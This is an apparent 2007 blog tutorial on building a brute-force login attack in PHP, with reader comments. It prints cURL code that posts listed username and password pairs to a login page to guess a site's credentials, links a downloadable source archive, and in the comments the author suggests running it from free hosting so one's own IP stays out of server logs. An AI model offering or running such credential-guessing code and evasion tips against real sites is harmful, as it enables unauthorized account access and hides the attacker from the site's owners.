How To Make Brute Force Attack
To make brute force attack you can use CURL library to grab web content .
Brute Force Attack here is to try to find exact username and password which is had by a site..
For example you want to login …. if you try one by one it will take a lot of time
But with this code you just make list of username and password …
And the program which will try all the list automatically …
This code can’t be process if the site has CAPTCHA or Generate Image Verification
You can download source code here :
http://phptutorial.byethost13.com/BFA.zip
<?
function InsertAuto($username,$password)
{
$url=”http://localhost/login.php“;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_POST, 1);
$post_fields = “username=$username&password=$password”;
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$response_string = curl_exec($ch);
curl_close($ch);
return $response_string;
}
$row[0][0] = “username1″;
$row[0][1] = “password1″;
$row[1][0] = “username2″;
$row[1][1] = “password2″;
$count = 2;
for ($i=0;$i<$count;$i++)
{
InsertAuto($row[$i][0],$row[$i][1]);
}
?>
December 26th, 2007 at 8:05 pm
Can you guess why the code on this page makes the author a shitty, shitty programmer?
Hint - try it in real life.
December 26th, 2007 at 11:11 pm
hmm…
it can’t be done .. if the website has captcha …
of course i didn’t show all the code…
only the basic idea …
December 27th, 2007 at 1:49 am
You can’t see the fault, and you’re writing how-to’s. Hilarious.
December 28th, 2007 at 6:51 am
Wouldn’t there be a lot of entries in the webserver log listing your IP address?
December 28th, 2007 at 8:46 am
Of course there will be a lot of entries (IP Address) … in web server log …
so it must be done in free hosting ….